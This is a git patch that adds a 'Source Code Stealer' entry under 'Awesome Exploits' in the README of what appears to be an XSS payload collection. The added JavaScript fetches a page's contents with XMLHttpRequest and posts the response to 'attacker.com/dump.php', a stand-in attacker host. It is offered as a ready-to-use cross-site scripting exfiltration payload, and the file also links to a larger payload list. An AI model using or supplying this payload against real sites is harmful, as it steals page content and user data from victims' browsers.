From 501ba17ff196469dd22c2cd93e5447470dc48e11 Mon Sep 17 00:00:00 2001
From: Somdev Sangwan <s0md3v@gmail.com>
Date: Sun, 3 Jun 2018 11:29:31 +0530
Subject: [PATCH] Update README.md

---
 README.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/README.md b/README.md
index cf65ac5..ce3e66e 100644
--- a/README.md
+++ b/README.md
@@ -119,6 +119,19 @@ new class extends confirm``{}
 ```
 
 ### Awesome Exploits
+##### Source Code Stealer
+```javascript
+var request = new XMLHttpRequest();
+request.open("GET", url, true);
+request.send();
+request.onreadystatechange = function() {
+    if (request.readyState == 4)
+	      response = request.responseText;
+	      var dump = new XMLHttpRequest();
+	      dump.open("POST", "attacker.com/dump.php", true)
+	      dump.send(response);
+}
+```
 A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)
 
 ### Awesome Probing